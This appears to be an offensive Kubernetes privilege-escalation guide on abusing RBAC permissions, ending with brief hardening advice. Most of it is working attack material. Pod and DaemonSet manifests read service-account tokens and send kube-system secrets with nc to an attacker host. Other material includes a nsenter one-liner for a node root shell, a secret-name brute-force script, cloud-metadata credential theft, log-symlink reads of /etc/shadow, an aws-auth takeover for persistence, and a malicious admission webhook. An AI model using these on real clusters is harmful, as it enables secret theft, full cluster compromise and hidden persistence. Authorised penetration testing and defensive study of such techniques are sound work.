Abusing Roles/ClusterRoles in Kubernetes
Here you can find some potentially dangerous Roles and ClusterRoles configurations.
Remember that you can get all the supported resources with
kubectl api-resources
Privilege escalation in Kubernetes refers to the art of getting access to a different principal within the cluster with different privileges (within the Kubernetes cluster or in external clouds) than the ones you already have. There are basically 4 main techniques to escalate privileges in Kubernetes:
- Be able to impersonate other users/groups/SAs with better privileges within the kubernetes cluster or to external clouds
- Be able to create/patch/exec pods where you can find or attach SAs with better privileges within the kubernetes cluster or to external clouds
- Be able to read secrets as the SAs tokens are stored as secrets
- Be able to escape to the node from a container, where you can steal all the secrets of the containers running in the node, the credentials of the node, and the permissions of the node within the cloud it's running in (if any)
- A fifth technique that deserves a mention is the ability to run port-forward in a pod, as you may be able to access interesting resources within that pod.
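Before trying any of these techniques it's useful to enumerate what the current principal can actually do. A minimal sketch with kubectl (the impersonated service account name is just an example, and the --as check requires impersonation privileges):
# List all permissions of the current principal in the current namespace
kubectl auth can-i --list
# Check a specific risky permission
kubectl auth can-i create pods -n kube-system
# Same check impersonating another principal
kubectl auth can-i list secrets -n kube-system --as=system:serviceaccount:kube-system:bootstrap-signer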
This privilege provides access to any resource with any verb. It is the most substantial privilege that a user can get, especially if it is granted as a “ClusterRole.” If it’s a “ClusterRole,” then the user can access the resources of any namespace and own the cluster with that permission.
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: api-resource-verbs-all
rules:
- apiGroups: ["*"]
  resources: ["*"]
  verbs: ["*"]
Giving a user permission to access any resource can be very risky. But, which verbs allow access to these resources? Here are some dangerous RBAC permissions that can damage the whole cluster:
- resources: ["*"] verbs: ["create"] – This privilege can create any resource in the cluster, such as pods, roles, etc. An attacker might abuse it to escalate privileges. An example of this can be found in the “Pods Creation” section.
- resources: ["*"] verbs: ["list"] – The ability to list any resource can be used to leak other users’ secrets and might make it easier to escalate privileges. An example of this is located in the “Listing secrets” section.
- resources: ["*"] verbs: ["get"] – This privilege can be used to get secrets from other service accounts.
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: api-resource-verbs-all
rules:
- apiGroups: ["*"]
  resources: ["*"]
  verbs: ["create", "list", "get"]
An attacker with permission to create a pod in the “kube-system” namespace can create cryptomining containers, for example. Moreover, if there is a service account with privileged permissions, by running a pod with that service account those permissions can be abused to escalate privileges.
Here we have a default privileged account named bootstrap-signer with permissions to list all secrets.

The attacker can create a malicious pod that will use the privileged service account. Then, abusing the service account token, it will exfiltrate the secrets:

apiVersion: v1
kind: Pod
metadata:
  name: alpine
  namespace: kube-system
spec:
  containers:
  - name: alpine
    image: alpine
    command: ["/bin/sh"]
    args: ["-c", 'apk update && apk add curl --no-cache; cat /run/secrets/kubernetes.io/serviceaccount/token | { read TOKEN; curl -k -v -H "Authorization: Bearer $TOKEN" -H "Content-Type: application/json" https://192.168.154.228:8443/api/v1/namespaces/kube-system/secrets; } | nc -nv 192.168.154.228 6666; sleep 100000']
  serviceAccountName: bootstrap-signer
  automountServiceAccountToken: true
  hostNetwork: true
In the previous definition note how the bootstrap-signer service account is used in serviceAccountName. So just create the malicious pod and expect the secrets on port 6666:
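For example, on the attacker host (192.168.154.228 in the previous YAML), a minimal sketch to catch the exfiltrated secrets (the manifest filename is just an example):
# Listen for the secrets the pod will pipe through nc
nc -lvnp 6666
# In another shell, create the malicious pod
kubectl --token $token create -f malicious-pod.yaml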
The following definition gives all the privileges a container can have:
- Privileged access (disabling protections and setting capabilities)
- Disable the hostIPC and hostPID namespace isolation, which can help to escalate privileges
- Disable the hostNetwork namespace isolation, giving access to steal the node's cloud privileges and better access to networks
- Mount the host's / inside the container
super_privs.yaml
apiVersion: v1
kind: Pod
metadata:
  name: ubuntu
  labels:
    app: ubuntu
spec:
  # Uncomment and specify a specific node you want to debug
  # nodeName: <insert-node-name-here>
  containers:
  - image: ubuntu
    command:
    - "sleep"
    - "3600" # adjust this as needed -- use only as long as you need
    imagePullPolicy: IfNotPresent
    name: ubuntu
    securityContext:
      allowPrivilegeEscalation: true
      privileged: true
      #capabilities:
      #  add: ["NET_ADMIN", "SYS_ADMIN"] # add the capabilities you need https://man7.org/linux/man-pages/man7/capabilities.7.html
      runAsUser: 0 # run as root (or any other user)
    volumeMounts:
    - mountPath: /host
      name: host-volume
  restartPolicy: Never # we want to be intentional about running this pod
  hostIPC: true # Use the host's ipc namespace https://www.man7.org/linux/man-pages/man7/ipc_namespaces.7.html
  hostNetwork: true # Use the host's network namespace https://www.man7.org/linux/man-pages/man7/network_namespaces.7.html
  hostPID: true # Use the host's pid namespace https://man7.org/linux/man-pages/man7/pid_namespaces.7.html
  volumes:
  - name: host-volume
    hostPath:
      path: /
Create the pod with:
kubectl --token $token create -f super_privs.yaml
Or, as a one-liner, create a pod with hostPID and a privileged container that uses nsenter to get a root shell on the node (the shell binary comes from the host filesystem after nsenter):
kubectl run r00t --restart=Never -ti --rm --image lol --overrides '{"spec":{"hostPID": true, "containers":[{"name":"1","image":"alpine","command":["nsenter","--mount=/proc/1/ns/mnt","--","/bin/bash"],"stdin": true,"tty":true,"imagePullPolicy":"IfNotPresent","securityContext":{"privileged":true}}]}}'
Now that you can escape to the node, check the post-exploitation techniques in:
You probably want to be stealthier. In the following pages you can see what you would be able to access if you create a pod only enabling some of the mentioned privileges from the previous template:
- Privileged + hostPID
- Privileged only
- hostPath
- hostPID
- hostNetwork
- hostIPC
You can find examples of how to create/abuse the previous privileged pod configurations in https://github.com/BishopFox/badPods
If you can create a pod (and optionally a service account) you might be able to obtain privileges in a cloud environment by assigning cloud roles to a pod or a service account and then accessing them.
Moreover, if you can create a pod with the host network namespace you can steal the IAM role of the node instance, as sketched below.
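For example, a rough sketch from inside such a pod on an EC2-backed node (the IMDS address is standard; the role name returned by the first request replaces the placeholder; if IMDSv2 is enforced you need to request a session token first):
# Discover the IAM role attached to the node
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
# Retrieve temporary credentials for that role
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/<node-role-name>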
For more information check:
Deployments, DaemonSets, StatefulSets, ReplicationControllers, ReplicaSets, Jobs and CronJobs are all privileges that allow the creation of different tasks in the cluster. Moreover, it's possible to use all of them to deploy pods. So it's possible to abuse them to escalate privileges just like in the previous example.
Suppose we have permission to create a DaemonSet and we create the following YAML file. This YAML file is configured to do the same steps we mentioned in the “create pods” section.
apiVersion: apps/v1
kind: DaemonSet
metadata:
  name: alpine
  namespace: kube-system
spec:
  selector:
    matchLabels:
      name: alpine
  template:
    metadata:
      labels:
        name: alpine
    spec:
      serviceAccountName: bootstrap-signer
      automountServiceAccountToken: true
      hostNetwork: true
      containers:
      - name: alpine
        image: alpine
        command: ["/bin/sh"]
        args: ["-c", 'apk update && apk add curl --no-cache; cat /run/secrets/kubernetes.io/serviceaccount/token | { read TOKEN; curl -k -v -H "Authorization: Bearer $TOKEN" -H "Content-Type: application/json" https://192.168.154.228:8443/api/v1/namespaces/kube-system/secrets; } | nc -nv 192.168.154.228 6666; sleep 100000']
        volumeMounts:
        - mountPath: /root
          name: mount-node-root
      volumes:
      - name: mount-node-root
        hostPath:
          path: /
In line 6 you can find the object “spec” and children objects such as “template” in line 10. These objects hold the configuration for the task we wish to accomplish. Another thing to notice is the "serviceAccountName" in line 15 and the “containers” object in line 18. This is the part that relates to creating our malicious container.
Kubernetes API documentation indicates that the “PodTemplateSpec” endpoint has the option to create containers. And, as you can see: Deployments, DaemonSets, StatefulSets, ReplicationControllers, ReplicaSets, Jobs and CronJobs can all be used to create pods:

So, the privilege to create or update tasks can also be abused for privilege escalation in the cluster.
pods/exec is a resource in Kubernetes used for running commands in a shell inside a pod. This privilege is meant for administrators who want to access containers and run commands. It’s just like creating an SSH session to the container. If we have this privilege, we actually get the ability to take control of all the pods. In order to do that, we need to use the following command:
kubectl exec -it <POD_NAME> -n <NAMESPACE> -- sh
Note that as you can get inside any pod, you can abuse other pods' tokens just like in the Pod Creation exploitation to try to escalate privileges.
This permission allows forwarding one local port to a port in the specified pod. This is meant to make it easy to debug applications running inside a pod, but an attacker might abuse it to get access to interesting (like DBs) or vulnerable (webs?) applications inside a pod:
kubectl port-forward pod/mypod 5000:5000
As indicated in this research, if you can access or create a pod with the host's /var/log/ directory mounted on it, you can escape from the container.
This is basically because when the Kube-API tries to get the logs of a container (using kubectl logs <pod>), it requests the 0.log file of the pod using the /logs/ endpoint of the Kubelet service.
The Kubelet service exposes the /logs/ endpoint, which is basically exposing the /var/log filesystem of the node. Therefore, an attacker with access to write in the /var/log/ folder of the node (mounted in the container) could abuse this behaviour in 2 ways:
- Modifying the 0.log file of its container (usually located in /var/log/pods/namespace_pod_uid/container/0.log) to be a symlink pointing to /etc/shadow, for example. Then, you will be able to exfiltrate the host's shadow file doing:
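A sketch of the symlink step from inside the pod, assuming the host's /var/log is mounted at /hostlogs and using placeholder path components:
# Point this pod's 0.log at the host's /etc/shadow
ln -sf /etc/shadow /hostlogs/pods/<namespace>_<pod>_<uid>/<container>/0.log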
kubectl logs escaper
failed to get parse function: unsupported log format: "root::::::::\n"
kubectl logs escaper --tail=2
failed to get parse function: unsupported log format: "systemd-resolve:*:::::::\n"
# Keep incrementing tail to exfiltrate the whole file
- If the attacker controls any principal with permissions to read nodes/log, he can just create a symlink in /host-mounted/var/log/sym pointing to / and when accessing https://<gateway>:10250/logs/sym/ he will list the host's root filesystem (changing the symlink can provide access to files).
curl -k -H 'Authorization: Bearer eyJhbGciOiJSUzI1NiIsImtpZCI6Im[...]' 'https://172.17.0.1:10250/logs/sym/'
<a href="bin">bin</a>
<a href="data/">data/</a>
<a href="dev/">dev/</a>
<a href="etc/">etc/</a>
<a href="home/">home/</a>
<a href="init">init</a>
<a href="lib">lib</a>
[...]
A laboratory and automated exploit can be found in https://blog.aquasec.com/kubernetes-security-pod-escape-log-mounts
If you are lucky enough and the highly privileged capability CAP_SYS_ADMIN is available, you can just remount the folder as rw:
mount -o rw,remount /hostlogs/
It's also possible to bypass the following protection:
allowedHostPaths:
- pathPrefix: "/foo"
  readOnly: true
This was meant to prevent escapes like the previous ones. The bypass consists of, instead of using a hostPath mount, using a PersistentVolume and a PersistentVolumeClaim to mount the host's folder in the container with writable access:
apiVersion: v1
kind: PersistentVolume
metadata:
  name: task-pv-volume-vol
  labels:
    type: local
spec:
  storageClassName: manual
  capacity:
    storage: 10Gi
  accessModes:
  - ReadWriteOnce
  hostPath:
    path: "/var/log"
---
apiVersion: v1
kind: PersistentVolumeClaim
metadata:
  name: task-pv-claim-vol
spec:
  storageClassName: manual
  accessModes:
  - ReadWriteOnce
  resources:
    requests:
      storage: 3Gi
---
apiVersion: v1
kind: Pod
metadata:
  name: task-pv-pod
spec:
  volumes:
  - name: task-pv-storage-vol
    persistentVolumeClaim:
      claimName: task-pv-claim-vol
  containers:
  - name: task-pv-container
    image: ubuntu:latest
    command: [ "sh", "-c", "sleep 1h" ]
    volumeMounts:
    - mountPath: "/hostlogs"
      name: task-pv-storage-vol
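A sketch of using it (the manifest filename is an example); once the pod is running, the host's /var/log is writable under /hostlogs and the previous symlink trick applies:
kubectl apply -f pv-pvc-pod.yaml
kubectl exec -it task-pv-pod -- ls -l /hostlogs/pods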
In this example, the service account sa-imper has a binding to a ClusterRole with rules that allow it to impersonate groups and users.


It's possible to list all secrets with the --as=null --as-group=system:masters attributes:
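A minimal sketch of the kubectl invocation (assuming the impersonator's token is in $TOKEN):
kubectl --token $TOKEN get secrets -n kube-system --as=null --as-group=system:masters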
It's also possible to perform the same action via the API REST endpoint:
curl -k -v -XGET -H "Authorization: Bearer <JWT TOKEN (of the impersonator)>" \
  -H "Impersonate-Group: system:masters" \
  -H "Impersonate-User: null" \
  -H "Accept: application/json" \
  https://<master_ip>:<port>/api/v1/namespaces/kube-system/secrets/
The listing secrets privilege is a strong capability to have in the cluster. A user with the permission to list secrets can potentially view all the secrets in the cluster – including the admin keys. The secret key is a JWT token encoded in base64.

An attacker that gains access to _list secrets_ in the cluster can use the following curl commands to get all secrets in “kube-system” namespace:
curl -v -H "Authorization: Bearer <jwt_token>" https://<master_ip>:<port>/api/v1/namespaces/kube-system/secrets/

An attacker that found a token with permission to read a secret can’t use this permission without knowing the full secret’s name. This permission is different from the listing secrets permission described above.


Although the attacker doesn’t know the secret’s name, there are default service accounts that can be enumerated.

Each service account has an associated secret with a static (non-changing) prefix and a postfix of a random five-character string token at the end.

The random token structure is a 5-character string built from alphanumeric (lowercase letters and digits) characters. But it doesn’t contain all the letters and digits.
When looking inside the source code, it appears that the token is generated from only 27 characters “bcdfghjklmnpqrstvwxz2456789” and not 36 (a-z and 0-9)


This means that there are 27^5 = 14,348,907 possibilities for a token.
An attacker can run a brute-force attack to guess the token ID in a couple of hours. Succeeding in getting secrets from default sensitive service accounts will allow him to escalate privileges.
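A rough sketch of such a brute force (APISERVER and TOKEN are assumptions; it tries every default-token-xxxxx name in kube-system):
#!/bin/bash
APISERVER="https://<master_ip>:<port>"
TOKEN="<jwt_with_get_permission_on_secrets>"
CHARS="b c d f g h j k l m n p q r s t v w x z 2 4 5 6 7 8 9"
for a in $CHARS; do for b in $CHARS; do for c in $CHARS; do for d in $CHARS; do for e in $CHARS; do
  NAME="default-token-$a$b$c$d$e"
  # 200 means the guessed secret name exists and is readable
  CODE=$(curl -sk -o /dev/null -w '%{http_code}' -H "Authorization: Bearer $TOKEN" \
    "$APISERVER/api/v1/namespaces/kube-system/secrets/$NAME")
  [ "$CODE" = "200" ] && echo "Found: $NAME"
done; done; done; done; done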
If you have the verb create on the resource certificatesigningrequests (or at least on certificatesigningrequests/nodeClient), you can create a CSR for a new node. According to the documentation it's possible to auto-approve these requests, so in that case you don't need extra permissions. If not, you would need to be able to approve the request, which means update on certificatesigningrequests/approval and approve on signers with resourceName <signerNameDomain>/<signerNamePath> or <signerNameDomain>/*.
An example of a role with all the required permissions is:
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: csr-approver
rules:
- apiGroups:
  - certificates.k8s.io
  resources:
  - certificatesigningrequests
  verbs:
  - get
  - list
  - watch
  - create
- apiGroups:
  - certificates.k8s.io
  resources:
  - certificatesigningrequests/approval
  verbs:
  - update
- apiGroups:
  - certificates.k8s.io
  resources:
  - signers
  resourceNames:
  - example.com/my-signer-name # example.com/* can be used to authorize for all signers in the 'example.com' domain
  verbs:
  - approve
So, with the new node CSR approved, you can abuse the special permissions of nodes to steal secrets and escalate privileges.
In this post and this one, the GKE K8s TLS Bootstrap configuration is set up with automatic signing, and it's abused to generate credentials of a new K8s node and then abuse those to escalate privileges by stealing secrets.
If you have the mentioned privileges you could do the same thing. Note that the first example bypasses the error preventing a new node from accessing secrets inside containers, because a node can only access the secrets of the containers mounted on it.
The way to bypass this is just to create node credentials for the node name where the container with the interesting secrets is running (check how to do it in the first post):
"/O=system:nodes/CN=system:node:gke-cluster19-default-pool-6c73b1-8cj1"
Principals that can modify configmaps in the kube-system namespace of EKS clusters (need to be in AWS) can obtain cluster admin privileges by overwriting the aws-auth configmap.
The verbs needed are update and patch, or create if the configmap wasn't created:
# Check if the config map exists
kubectl get configmap aws-auth -n kube-system -o yaml
## Yaml example
apiVersion: v1
kind: ConfigMap
metadata:
  name: aws-auth
  namespace: kube-system
data:
  mapRoles: |
    - rolearn: arn:aws:iam::123456789098:role/SomeRoleTestName
      username: system:node:{{EC2PrivateDNSName}}
      groups:
        - system:masters
# Create the config map if it doesn't exist
## Using kubectl and the previous yaml
kubectl apply -f /tmp/aws-auth.yaml
## Using eksctl
eksctl create iamidentitymapping --cluster Testing --region us-east-1 --arn arn:aws:iam::123456789098:role/SomeRoleTestName --group "system:masters" --no-duplicate-arns
# Modify it
kubectl edit -n kube-system configmap/aws-auth
## You can modify it to even give access to users from other accounts
data:
  mapRoles: |
    - rolearn: arn:aws:iam::123456789098:role/SomeRoleTestName
      username: system:node:{{EC2PrivateDNSName}}
      groups:
        - system:masters
  mapUsers: |
    - userarn: arn:aws:iam::098765432123:user/SomeUserTestName
      username: admin
      groups:
        - system:masters
You can use aws-auth for persistence, giving access to users from other accounts. However, aws --profile other_account eks update-kubeconfig --name <cluster-name> doesn't work from a different account. But actually aws --profile other_account eks get-token --cluster-name arn:aws:eks:us-east-1:123456789098:cluster/Testing works if you put the ARN of the cluster instead of just the name.
To make kubectl work, just make sure to configure the victim's kubeconfig and in the aws exec args add --profile other_account_role so kubectl will be using the other account's profile to get the token and contact AWS.
There are 2 ways to assign K8s permissions to GCP principals. In any case the principal also needs the permission container.clusters.get to be able to gather credentials to access the cluster, or you will need to generate your own kubectl config file (follow the next link).
When talking to the K8s API endpoint, the GCP auth token will be sent. Then GCP, through the K8s API endpoint, will first check if the principal (by email) has any access inside the cluster, and then it will check if it has any access via GCP IAM. If either of those is true, the request will be answered. If not, an error suggesting to give permissions via GCP IAM will be returned.
So, the first method is using GCP IAM: the K8s permissions have their equivalent GCP IAM permissions, and if the principal has them, it will be able to use them.
The second method is assigning K8s permissions inside the cluster, identifying the user by their email (GCP service accounts included).
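For example, a sketch of gathering credentials and using them (requires container.clusters.get; names are placeholders):
gcloud container clusters get-credentials <cluster-name> --zone <zone> --project <project>
kubectl get secrets -n kube-system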
Principals that can create TokenRequests (serviceaccounts/token) can issue tokens for admin-equivalent SAs (info from here), as shown below.
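A minimal sketch with kubectl (v1.24+; the service account name is a placeholder):
# Issue a short-lived token for a privileged service account
kubectl create token <privileged-sa> -n kube-system --duration=1h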
Principals that can update or patch pods/ephemeralcontainers can gain code execution on other pods, and potentially break out to their node, by adding an ephemeral container with a privileged securityContext. See the sketch below.
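The easiest way to reach pods/ephemeralcontainers is kubectl debug, which attaches an ephemeral container to a running pod (pod, container and image are placeholders; note that injecting a privileged securityContext requires patching the subresource directly, since kubectl debug doesn't expose it):
kubectl debug -it <victim-pod> --image=alpine --target=<victim-container> -- sh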
Principals with any of the verbs create, update or patch over validatingwebhookconfigurations or mutatingwebhookconfigurations might be able to create such a webhookconfiguration in order to escalate privileges.
As you can read in the section Built-in Privileged Escalation Prevention below, a principal cannot update nor create roles or clusterroles without having those new permissions himself. Except if he has the verb escalate over roles or clusterroles: then he can update/create new roles and clusterroles with better permissions than the ones he has.
Principals with access to the nodes/proxy subresource can execute code on pods via the Kubelet API (according to this), as sketched below. More information about Kubelet authentication in this page:
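A rough sketch of abusing nodes/proxy (assumes a token with that permission; node, namespace, pod and container names are placeholders):
# Execute a command in a container by proxying to the kubelet's /run endpoint through the API server
curl -sk -X POST -H "Authorization: Bearer $TOKEN" \
  "https://<master_ip>:<port>/api/v1/nodes/<node>/proxy/run/<namespace>/<pod>/<container>" \
  -d "cmd=id"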
Principals that can delete pods (delete verb over the pods resource), or evict pods (create verb over the pods/eviction resource), or change pod status (access to pods/status), and can make other nodes unschedulable (access to nodes/status) or delete nodes (delete verb over the nodes resource), and have control over a pod, could steal pods from other nodes so they are executed in the compromised node, where the attacker can steal the tokens from those pods:
patch_node_capacity(){
  curl -s -X PATCH 127.0.0.1:8001/api/v1/nodes/$1/status -H "Content-Type: application/json-patch+json" -d '[{"op": "replace", "path":"/status/allocatable/pods", "value": "0"}]'
}
while true; do patch_node_capacity <id_other_node>; done &
#Launch previous line with all the nodes you need to attack
kubectl delete pods -n kube-system <privileged_pod_name>
Principals that can modify services/status may set the status.loadBalancer.ingress.ip field to exploit the unfixed CVE-2020-8554 and launch MiTM attacks against the cluster. Most mitigations for CVE-2020-8554 only prevent ExternalIP services (according to this).
Principals with update or patch permissions over nodes/status or pods/status could modify labels to affect the scheduling constraints enforced.
Although there can be risky permissions, Kubernetes is doing good work preventing other types of permissions with potential for privilege escalation.
The RBAC API prevents users from escalating privileges by editing roles or role bindings. Because this is enforced at the API level, it applies even when the RBAC authorizer is not in use. A user can only create/update a role if they already have all the permissions contained in the role, at the same scope as the role (cluster-wide for a ClusterRole, within the same namespace or cluster-wide for a Role).
There is an exception to the previous rule: if a principal has the verb escalate over roles or clusterroles, he can increase the privileges of roles and clusterroles even without having the permissions himself.
Let’s see an example of such prevention.
A service account named sa7 is in a RoleBinding edit-role-rolebinding. This RoleBinding object has a role named edit-role that has full permissions rules on roles. Theoretically, it means that the service account can edit any role in the default namespace.


There is also an existing role named list-pods. Anyone with this role can list all the pods on the default namespace. The user sa7 should have permissions to edit any roles, so let’s see what happens when it tries to add the “secrets” resource to the role’s resources.

After trying to do so, we will receive an error “forbidden: attempt to grant extra privileges”, because although our sa7 user has permissions to update roles for any resource, it can update the role only for resources over which it has permissions.

Apparently this technique worked before, but according to my tests it's not working anymore for the same reason explained in the previous section: you cannot create/modify a rolebinding to give yourself or a different SA some privileges you don't already have.
The privilege to create Rolebindings allows a user to bind roles to a service account. This privilege can potentially lead to privilege escalation because it allows the user to bind admin privileges to a compromised service account.
The following ClusterRole is using the special verb bind that allows a user to create a RoleBinding with the admin ClusterRole (default high privileged role) and to add any user, including itself, to this admin ClusterRole.
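A sketch of what such a ClusterRole could look like (the role name is an example; the bind verb restricted via resourceNames is the key part):
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: role-binder
rules:
- apiGroups: ["rbac.authorization.k8s.io"]
  resources: ["rolebindings"]
  verbs: ["create"]
- apiGroups: ["rbac.authorization.k8s.io"]
  resources: ["clusterroles"]
  verbs: ["bind"]
  resourceNames: ["admin"]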

Then it's possible to create malicious-RoleBinding.json, which binds the admin role to another compromised service account:
{
  "apiVersion": "rbac.authorization.k8s.io/v1",
  "kind": "RoleBinding",
  "metadata": {
    "name": "malicious-rolebinding",
    "namespace": "default"
  },
  "roleRef": {
    "apiGroup": "rbac.authorization.k8s.io",
    "kind": "ClusterRole",
    "name": "admin"
  },
  "subjects": [
    {
      "kind": "ServiceAccount",
      "name": "compromised-svc",
      "namespace": "default"
    }
  ]
}
The purpose of this JSON file is to bind the admin “ClusterRole” (line 11) to the compromised service account (line 16).
Now, all we need to do is to send our JSON as a POST request to the API using the following CURL command:
curl -k -v -X POST -H "Authorization: Bearer <JWT TOKEN>" \
-H "Content-Type: application/json" \
https://<master_ip>:<port>/apis/rbac.authorization.k8s.io/v1/namespaces/default/rolebindings \
-d @malicious-RoleBinding.json
After the admin role is bound to the “compromised-svc” service account, we can use the compromised service account token to list secrets. The following CURL command will do this:
curl -k -v -X GET -H "Authorization: Bearer <COMPROMISED JWT TOKEN>" \
  -H "Content-Type: application/json" \
  https://<master_ip>:<port>/api/v1/namespaces/kube-system/secrets
By default there isn't any encryption in the communication between pods. Mutual authentication, two-way, pod to pod.
Create your .yaml
kubectl run app --image=bash --command -oyaml --dry-run=client > <appName.yaml> -- sh -c 'ping google.com'
Edit your .yaml and add the uncommented lines:
#apiVersion: v1
#kind: Pod
#metadata:
#  name: security-context-demo
#spec:
#  securityContext:
#    runAsUser: 1000
#    runAsGroup: 3000
#    fsGroup: 2000
#  volumes:
#  - name: sec-ctx-vol
#    emptyDir: {}
#  containers:
#  - name: sec-ctx-demo
#    image: busybox
    command: [ "sh", "-c", "apt update && apt install iptables -y && iptables -L && sleep 1h" ]
    securityContext:
      capabilities:
        add: ["NET_ADMIN"]
#    volumeMounts:
#    - name: sec-ctx-vol
#      mountPath: /data/demo
#  securityContext:
#    allowPrivilegeEscalation: true
See the logs of the proxy:
kubectl logs app -c proxy
An admission controller is a piece of code that intercepts requests to the Kubernetes API server before the persistence of the object, but after the request is authenticated and authorized.
If an attacker somehow manages to inject a Mutating Admission Controller, he will be able to modify already authenticated requests, potentially being able to privesc and, more usually, to persist in the cluster.
git clone https://github.com/rewanthtammana/malicious-admission-controller-webhook-demo
cd malicious-admission-controller-webhook-demo
./deploy.sh
kubectl get po -n webhook-demo -w
Wait until the webhook server is ready. Check the status:
kubectl get mutatingwebhookconfigurations
kubectl get deploy,svc -n webhook-demo

Once we have our malicious mutating webhook running, let's deploy a new pod.
kubectl run nginx --image nginx
kubectl get po -w
Wait again, until you see the change in pod status. Now you can see an ErrImagePull error. Check the image name with either of these queries:
kubectl get po nginx -o=jsonpath='{.spec.containers[].image}{"\n"}'
kubectl describe po nginx | grep "Image: "

As you can see in the output above, we tried running the image nginx but the final executed image is rewanthtammana/malicious-image. What just happened!!?
We will unfold what just happened. The ./deploy.sh script that you executed created a mutating webhook admission controller. The lines below from the mutating webhook admission controller are responsible for the above results:
patches = append(patches, patchOperation{
  Op:    "replace",
  Path:  "/spec/containers/0/image",
  Value: "rewanthtammana/malicious-image",
})
The above snippet replaces the first container image in every pod with rewanthtammana/malicious-image.
When a pod is being created, it automatically mounts a service account token (the default is the default service account in the same namespace). Not every pod needs the ability to utilize the API from within itself.
From version 1.6+ it is possible to prevent the automounting of service account tokens on pods using automountServiceAccountToken: false. It can be used on service accounts or pods.
On a service account it should be added like this:

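A minimal sketch (the account name is an example):
apiVersion: v1
kind: ServiceAccount
metadata:
  name: my-serviceaccount
automountServiceAccountToken: false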
It is also possible to use it on the pod:

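A minimal sketch of the pod-level equivalent (the pod spec field overrides the service account setting):
apiVersion: v1
kind: Pod
metadata:
  name: my-pod
spec:
  serviceAccountName: my-serviceaccount
  automountServiceAccountToken: false
  containers:
  - name: app
    image: nginx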
When creating RoleBindings/ClusterRoleBindings, make sure that only the users that need the role are inside the binding. It is easy to forget users that are no longer relevant inside such groups.
ClusterRoles and ClusterRoleBindings apply to the whole cluster: a user in such a binding has its permissions over all the namespaces, which is sometimes unnecessary. Roles and RoleBindings can be applied to a specific namespace and provide another layer of security.